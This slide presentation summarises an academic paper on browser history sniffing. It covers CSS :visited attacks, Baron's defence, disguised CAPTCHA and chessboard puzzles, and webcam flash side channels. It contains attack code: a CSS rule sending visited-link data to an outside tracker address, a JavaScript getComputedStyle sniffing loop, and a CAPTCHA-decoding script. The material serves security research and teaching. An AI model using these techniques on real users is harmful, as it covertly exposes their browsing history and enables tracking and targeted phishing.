Zachary Weinberg, Eric Y. Chen, Pavithra Ramesh Jayaraman, Collin Jackson
Carnegie Mellon University
I Still Know What You Visited Last Summer: User interaction and side-channel attacks on browsing history
IEEE Symposium on Security and Privacy, May 2011
Outline
- Introduction
- Automated Attacks
- Exp 1: Interactive Attacks
- Exp 2: Side-Channel Attacks
- Related Work
- Conclusion
Introduction
History sniffing through CSS :visited (Andrew Clover, 2002, http://seclists.org/bugtraq/2002/Feb/271)
In HTML:
    <a id="link1" href="http://google.com/">Visit Google!</a>
In CSS:
    #link1:visited {
      color: red;
      background: url(http://140.115.53.28/track.php?url=google.com);
    }
Introduction
Baron's defense (L. David Baron, 2010, http://dbaron.org/mozilla/visited-privacy):
- make getComputedStyle act as though all links are unvisited
- make certain CSS selectors act as though links are always unvisited
- limit the CSS properties that can be used to style visited links to color, background-color, border-*-color, outline-color, column-rule-color, fill, and stroke
The latest versions of Firefox, Chrome, Safari, and IE all adopt this defense, but they are still vulnerable to interactive attacks.
Introduction
Dongseok Jang et al., An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications
- Real exploiters probe only small sets of links (6~220)
- Found on 46 popular websites, including one from the Alexa Top 100
- Because small probe sets are enough in practice, interactive attacks are feasible
Introduction
What can history sniffers do?
Benign:
- Websites could use history sniffing to determine whether their users have visited known phishing sites.
- Websites could seed visitors' history with URLs made up for the purpose, and use the URLs to re-identify their visitors (like cookies).
Malicious:
- Track visitors across sites for advertising purposes, determining whether they also visit a site's competitors.
- Attackers can construct more targeted phishing pages, by impersonating only sites that a particular victim is known to visit.
Automated Attacks
Direct sniffing
    <style> a:visited { color: red; } </style>

    var url_array = new Array('http://a.com', 'http://b.com');
    var visited_array = new Array();
    var link_el = document.createElement('a');
    // the computed-style object is live: fetched once, re-read after each href change
    var computed_style = document.defaultView.getComputedStyle(link_el, "");
    for (var i = 0; i < url_array.length; i++) {
      link_el.href = url_array[i];
      // under the :visited rule above, a visited link reports the red color
      if (computed_style.getPropertyValue("color") == 'rgb(255, 0, 0)') {
        visited_array.push(url_array[i]);
      }
    }
Automated Attacks
Indirect sniffing
- Make visited and unvisited links take different amounts of space, which causes unrelated elements on the page to move; inspect the positions of those other elements.
- Make visited and unvisited links cause different images to load (a background-image style in the :visited rule). This variant does not require JavaScript.
Automated Attacks
Side-channel sniffing
- Timing attacks: the attacker can make the page take longer to lay out if a link is visited than if it is unvisited
- Transparent underline
- Any other style rules in :visited
Defense: Baron's solution does well against all three types above (direct/indirect/side-channel)
Exp 1: Interactive Attacks
- Interactive attacks require victims to interact with malicious sites
- The authors claim that interactive attacks can be disguised as "normal" interactive tasks that users will not find surprising or suspicious
- Amazon's Mechanical Turk: 307 participants recruited
- All tasks in this experiment operate within the constraints of Baron's defense: visited-link styles only change the color on the screen
- The tasks pretend to be CAPTCHA tests (CAPTCHA: Completely Automated Public Turing test to tell Computers and Humans Apart)
Exp 1: Interactive Attacks
1. Word CAPTCHA
- Each word is a hyperlink to a URL that the attacker wishes to probe
- If unvisited, the word is drawn in the same color as the background.
Exp 1: Interactive Attacks
2. Character CAPTCHA
- Seven-segment LCD symbols
- Every letter represents 3 URLs
- Site-supplied font
Exp 1: Interactive Attacks
- Segment sums: 4 + 5 = 9; 4 + F = A; 5 + F = 6; 4 + 5 + F = 8
- "–" is always on
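As an added illustration (not code from the paper or these slides) of why the character CAPTCHA leaks so much: one seven-segment glyph carries three visited/unvisited bits, so a response of n characters reports on 3n URLs. The segment naming (a..g, dash = middle segment g) and the placeholder URLs are assumptions.

```javascript
// Added illustration of the character-CAPTCHA encoding; not the paper's code.
// Assumed segment names: a=top, b=upper-right, c=lower-right, d=bottom,
// e=lower-left, f=upper-left, g=middle. The always-on dash is segment g.
const SEG = { a: 1, b: 2, c: 4, d: 8, e: 16, f: 32, g: 64 };
const segs = (names) => [...names].reduce((mask, n) => mask | SEG[n], 0);

// Each of the three URLs behind a glyph lights one sub-shape when :visited applies.
const SHAPES = [segs("bcfg"), segs("acdfg"), segs("aefg")]; // drawn as "4", "5", "F"
const ALWAYS_ON = SEG.g;

// Union shapes the victim sees; matches the slide's sums (4+5=9, 4+F=A, 5+F=6, 4+5+F=8).
const GLYPH_OF_MASK = new Map([
  [ALWAYS_ON, "-"],
  [SHAPES[0], "4"], [SHAPES[1], "5"], [SHAPES[2], "F"],
  [SHAPES[0] | SHAPES[1], "9"],
  [SHAPES[0] | SHAPES[2], "A"],
  [SHAPES[1] | SHAPES[2], "6"],
  [SHAPES[0] | SHAPES[1] | SHAPES[2], "8"],
]);
const MASK_OF_GLYPH = new Map([...GLYPH_OF_MASK].map(([m, g]) => [g, m]));

// Browser side: given which of the three URLs are visited, which glyph gets rendered.
function renderGlyph(visitedBits) {
  const mask = visitedBits.reduce((m, v, k) => (v ? m | SHAPES[k] : m), ALWAYS_ON);
  return GLYPH_OF_MASK.get(mask);
}

// Server side: the character the user typed back reveals the three visited bits.
function decodeGlyph(ch) {
  const mask = MASK_OF_GLYPH.get(ch.replace("–", "-").toUpperCase());
  if (mask === undefined) throw new Error(`not a CAPTCHA glyph: ${ch}`);
  return SHAPES.map((shape) => (mask & shape) === shape);
}

// Whole response: urls holds exactly three probe URLs per typed character.
function visitedUrls(typed, urls) {
  if (urls.length !== 3 * typed.length) throw new Error("need three URLs per glyph");
  return [...typed].flatMap((ch, i) =>
    decodeGlyph(ch).flatMap((v, k) => (v ? [urls[3 * i + k]] : [])));
}

// Constructed sample: six placeholder URLs; the 1st, 2nd and 6th are "visited".
const SAMPLE_URLS = ["u1", "u2", "u3", "u4", "u5", "u6"].map((u) => `https://example.test/${u}`);
const typed = renderGlyph([true, true, false]) + renderGlyph([false, false, true]); // "9F"
console.log(typed, visitedUrls(typed, SAMPLE_URLS));
```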
Exp 1: Interactive Attacks
3. Chessboard puzzle
- Each square contains a URL
- Only the pawns corresponding to visited sites are made visible
- SVG or text is used to control the pawns
Exp 1: Interactive Attacks
4. Pattern matching puzzle
Exp 1: Interactive Attacks
- Randomly generated task instances corresponding to known proportions of visited and unvisited links.
Exp 1: Interactive Attacks
- Automated history-sniffing exploits were also run on all the participants
- URL set from wtikay.com: 7012 commonly visited URLs (from the Alexa Top 5000)
Exp 1: Interactive Attacks (result figures; not preserved in this copy)
Exp 2: Side-channel Attacks
Webcam attacks using <blink>
- Random 20 URLs with 10 visited ones
- Variant 1: designed to comply with the WCAG standard for seizure safety
- Variant 2: make the entire browser window flash in a brighter color
Exp 2: Side-channel Attacks
Author test
- 100% accuracy for both variants in all conditions: well-lit room, person stays still in front of the computer
- In a dark room, accuracy dropped to 50%
Field test
- 60 / 307 participants
Exp 2: Side-channel Attacks
Field test (figure not preserved in this copy)
Exp 2: Side-channel Attacks
- In real life: the ChatRoulette service
- The attack works even when the closest reflector is a wall 10 to 20 feet away from the monitor
Related Work
- Page cache: Felten et al., Timing Attacks on Web Privacy
- DNS cache: Felten et al., Timing Attacks on Web Privacy
- Both tactics above work only the first time (they reveal only short-term history)
- Resources loadable cross-origin but only available to logged-in users (Facebook, Gmail, Twitter, etc.): probed via the JavaScript onerror event
Related Work
- Cookies, Flash Player local shared objects
- Ad-blockers, private browsing mode
Conclusion
- Automated history sniffing attacks have successfully been blocked by Baron's solution
- Interactive attacks are not
- This paper developed proofs of concept for 6 history sniffing exploits that work against Baron's defense: 4 interactive attacks and 2 that detect the screen through a webcam